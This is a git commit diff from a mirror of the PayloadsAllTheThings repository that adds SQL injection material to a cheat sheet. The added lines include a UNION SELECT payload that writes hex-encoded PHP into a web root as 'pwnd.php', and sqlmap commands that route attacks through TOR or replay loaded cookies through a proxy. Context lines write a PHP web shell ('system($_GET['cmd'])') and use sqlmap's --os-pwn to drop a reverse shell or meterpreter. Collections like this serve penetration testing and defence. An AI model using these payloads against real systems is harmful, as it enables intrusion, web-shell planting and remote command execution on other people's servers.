mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
SQLmap TOR + Cookie + Proxy
This commit is contained in:
parent
7b49f1b13a
commit
a3975ab261
@ -122,4 +122,5 @@ OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
|
|||||||
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
|
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
|
||||||
SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>
|
SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>
|
||||||
-1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
|
-1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
|
||||||
|
[...] UNION SELECT 1,2,3,4,5,0x3c3f70687020706870696e666f28293b203f3e into outfile 'C:\\wamp\\www\\pwnd.php'-- -
|
||||||
```
|
```
|
||||||
|
@ -138,6 +138,18 @@ Dropping a reverse-shell / meterpreter
|
|||||||
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
|
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Using TOR with SQLmap
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
sqlmap -u "http://www.target.com" --tor --tor-type=SOCKS5 --time-sec 11 --check-tor --level=5 --risk=3 --threads=5
|
||||||
|
```
|
||||||
|
|
||||||
|
Using Chrome cookie and a Proxy
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
sqlmap -u "https://test.com/index.php?id=99" --load-cookie=/media/truecrypt1/TI/cookie.txt --proxy "http://127.0.0.1:8080" -f --time-sec 15 --level 3
|
||||||
|
```
|
||||||
|
|
||||||
Using suffix to tamper the injection
|
Using suffix to tamper the injection
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
Loading…
Reference in New Issue
Block a user